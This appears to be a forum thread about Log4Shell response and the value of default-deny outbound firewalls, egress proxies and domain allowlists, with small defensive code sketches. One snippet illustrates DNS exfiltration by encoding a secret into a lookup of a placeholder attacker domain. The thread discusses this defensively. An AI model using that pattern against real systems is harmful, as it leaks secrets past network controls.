We just spent the better part of the day going through applications, figuring out whether they use log4j and, if so, which version, fixing code, and notifying customers. Then we remembered that the majority of our servers can't actually reach the internet. They only accept requests; they cannot make outbound requests to the internet.
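For anyone doing the same exercise, something like the following sketch can do a first pass over a server (the root path is a placeholder, and it won't catch log4j shaded into fat jars or renamed jars):

```python
# Hypothetical first-pass scan: walk a directory tree and report any
# log4j-core jars plus the version embedded in the file name.
# "/opt/applications" is a placeholder; adjust for where your apps live.
import re
from pathlib import Path

JAR_PATTERN = re.compile(r"log4j-core-(\d+(?:\.\d+)*)\.jar$")

def find_log4j(root: str):
    # Recursively look for jars whose name matches the log4j-core pattern.
    for jar in Path(root).rglob("*.jar"):
        match = JAR_PATTERN.search(jar.name)
        if match:
            yield jar, match.group(1)

if __name__ == "__main__":
    for path, version in find_log4j("/opt/applications"):
        print(f"{path}  log4j-core {version}")
```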
I know it's a little old-fashioned, as explained to me by a customer earlier this year. In the age of cloud, people expect their servers to have a direct internet connection.
It's annoying to work with, but ideally your devices should only be able to reach the internet via a proxy and/or only whitelisted hosts. Understandably there are cases where this just isn't an option, but really do consider whether your server truly needs to communicate with the internet at large. Can you use an HTTPS proxy and just whitelist the required domains? The answer is most often "yes", it's just a little more work.
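To make that concrete, here's a minimal sketch of what "through a proxy, whitelisted domains only" looks like from the application side; the proxy host and the vendor domain are placeholders for whatever your environment actually uses:

```python
# Route outbound HTTP(S) through an egress proxy. The proxy's allowlist,
# not the application, decides what is actually reachable.
# proxy.internal:3128 and api.vendor.example are made-up placeholders.
import urllib.request

proxy = urllib.request.ProxyHandler({
    "http": "http://proxy.internal:3128",
    "https": "http://proxy.internal:3128",
})
opener = urllib.request.build_opener(proxy)

# Succeeds only if the proxy allows api.vendor.example; anything else
# is rejected at the proxy instead of going out to the open internet.
with opener.open("https://api.vendor.example/health", timeout=10) as resp:
    print(resp.status)
```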
Is there any chance that, when asked to contact a service, your locked-down machines first issue a DNS lookup to determine where to connect, before the connection attempt gets blocked by your aggressive whitelisting?
If so, there might still be a DNS exfiltration vulnerability even in your tightly controlled setup.
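A minimal sketch of why that matters (the attacker domain is made up, but the pattern is real): the lookup itself carries data to whoever runs the authoritative nameserver for that zone, before any TCP connection is attempted or filtered:

```python
# Why DNS alone can leak data even when all outbound TCP is blocked.
# exfil.attacker-domain.example is a made-up zone for illustration.
import socket

secret = "internal-hostname-or-token"
lookup = f"{secret}.exfil.attacker-domain.example"

try:
    socket.getaddrinfo(lookup, 443)   # the DNS query leaves here
except socket.gaierror:
    pass  # the TCP connection never happens, but the query already left
```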
I would love it if PaaS providers such as Heroku and Fly.io had configurable outbound firewalls. Especially when building with uncurated package managers such as npm and PyPI, it's virtually impossible to audit all dependencies.
Exploits like this, and the now-regular news of packages being replaced with backdoored versions, make me very nervous. Being able to whitelist which outbound connections are allowed would help enormously, even though it would not solve all potential exploits.
Is there a recommended way to do this with a Docker app?
Edit: I should note we already use an inbound WAF like Cloudflare. What I want is something like Little Snitch, but for a PaaS-deployed app.
For PaaS this won't work, but for on-prem stuff you can just log firewall denies on outbound traffic; that will quickly let you know if something's wrong.
You could have a test environment where your container runs for a few days before pushing to production on a PaaS. Just run the container on a VM with iptables and logging. It won't find everything, since some calls might only be made under very specific circumstances, but it could find the low-hanging fruit.
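Something like the sketch below can then summarize what the container tried to reach. It assumes an iptables LOG rule on the OUTPUT chain with a known prefix and the Debian/Ubuntu default kernel log location; both are assumptions to adapt to your setup:

```python
# Summarize outbound attempts from iptables LOG entries, e.g. from a rule
# roughly like: iptables -A OUTPUT -j LOG --log-prefix "OUTBOUND: "
# Log file path and prefix are assumptions; adjust for your distro.
import re
from collections import Counter

LOG_FILE = "/var/log/kern.log"
PATTERN = re.compile(r"OUTBOUND: .*DST=(\S+).*DPT=(\d+)")

destinations = Counter()
with open(LOG_FILE) as fh:
    for line in fh:
        match = PATTERN.search(line)
        if match:
            destinations[(match.group(1), match.group(2))] += 1

# Most frequently attempted destination/port pairs first.
for (dst, port), count in destinations.most_common():
    print(f"{dst}:{port}  ({count} attempts)")
```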
Preach it. I have been the bane of third-party software vendors for years because I require a default-deny outbound policy for servers (and, generally, err on the side of default-deny between subnets).
This log4j vulnerability will serve, for me, as yet one more example as to why that's a good idea.
I think the bane is when you make it hard to get exceptions. If a developer can automatically add a specific IP, or ideally a domain, to the "allow" group, that has far less impact than having to fill in pages of paperwork explaining why you need outbound access. In the latter case, developers will work around your restrictions, and you're simply left with a false sense of security.
Arguably you shouldn't make it too hard to get exceptions, but what we frequently see is that the developers don't actually appear to know that their code makes outbound connections, and they certainly don't mention it as part of the requirements.
We've frequently built setups where machines are completely isolated, because the requirements didn't mention that the software would connect to servers on the internet. When we install the software it then fails to work, because it was never tested in a closed environment. I've seen Java applications fail to boot because they can't pull an XSD from the internet... Why isn't that just bundled? Why do you need to fetch it at boot time? What if that other server is down?
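For comparison, this is roughly what the "just bundle it" approach looks like (sketched in Python with lxml purely for illustration; the actual offenders were Java apps, and the paths are placeholders):

```python
# Validate against a schema shipped with the application instead of
# fetching it over the network at startup. Assumes lxml is installed;
# schema/orders.xsd and incoming/order.xml are placeholder paths.
from pathlib import Path
from lxml import etree

SCHEMA_PATH = Path(__file__).parent / "schema" / "orders.xsd"  # bundled copy

schema = etree.XMLSchema(etree.parse(str(SCHEMA_PATH)))
document = etree.parse("incoming/order.xml")

if not schema.validate(document):
    raise ValueError(schema.error_log.last_error)
```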
But you're right, valid firewall openings should not be hard to get.
So many vendors (I work with a lot of COTS software-- not in-house-developed) have absolutely no idea what their communication dependencies are (client-to-server, server-to-server, etc). I've ended up being the first sysadmin to ask more times than I'd like to count.
I, like the grandparent poster suggested, prefer to put applications whose developers demand carte blanche access to the internet via TCP port 443 behind a MITM proxy and whitelist domains. (I don't do as much to stop DNS-based exfiltration as I should, though. It's probably a good time to revisit that, using this vulnerability as practical justification.)
> I know it's a little old-fashioned, as explained to me by a customer earlier this year.
It is only considered outdated by proponents of cloud services, since IP-based filters are difficult to implement and/or require a lot of maintenance.
Otherwise sensible network segmentation and access rules are pretty much one of the best security mechanisms you can implement, far beyond the usual theatre some security products want to sell.